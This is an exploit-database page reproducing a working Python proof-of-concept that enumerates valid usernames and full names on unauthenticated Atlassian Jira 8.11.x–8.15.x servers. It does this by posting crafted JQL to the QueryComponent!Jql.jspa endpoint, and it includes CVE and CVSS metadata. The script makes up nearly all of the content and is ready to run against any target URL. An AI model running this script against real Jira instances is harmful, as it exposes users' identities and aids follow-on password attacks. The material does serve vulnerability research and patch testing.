Advertisement






Atlassian Jira 8.15.0 Username Enumeration

CVE Category Price Severity
CVE-2021-43230 CWE-200 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-06-01
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060002

Below is a copy:

Atlassian Jira 8.15.0 Username Enumeration
# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
# Date: 31/05/2021
# Exploit Author: Mohammed Aloraimi
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Vulnerable versions: version 8.11.x to 8.15.0
# Tested on: Kali Linux
# Proof Of Concept:

'''
A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint.

Tested versions:

Atlassian JIRA 8.11.1
Atlassian JIRA 8.13
Atlassian JIRA 8.15
'''

#!/usr/bin/env python

__author__  = "Mohammed Aloraimi (@ixSly)"



import requests
import sys
import re
import urllib3
urllib3.disable_warnings()


def help():
    print('python script.py <target> <username>')
    print('e.g. python script.py https://jiratarget.com admin')
    sys.exit()

if len(sys.argv) < 3:
  help()



def pwn(url,username):

        try:
                headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
                data="jql=creator+in+({})&decorator=none".format(username)
                req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)
                if "issue.field.project" in req.text and req.status_code == 200:
                        print("[+] {} is a Valid User".format(username))
                        userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())
                        if userFullName:
                                print("[+] User FullName: " + userFullName.group(1))
                elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
                        print("[-] {} is not a Valid User".format(username))
                else:
                        print("[-] Error..")
        except Exception as e:
                print(str(e))
                pass

server = sys.argv[1]
username = sys.argv[2]


pwn(server,username)
            

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum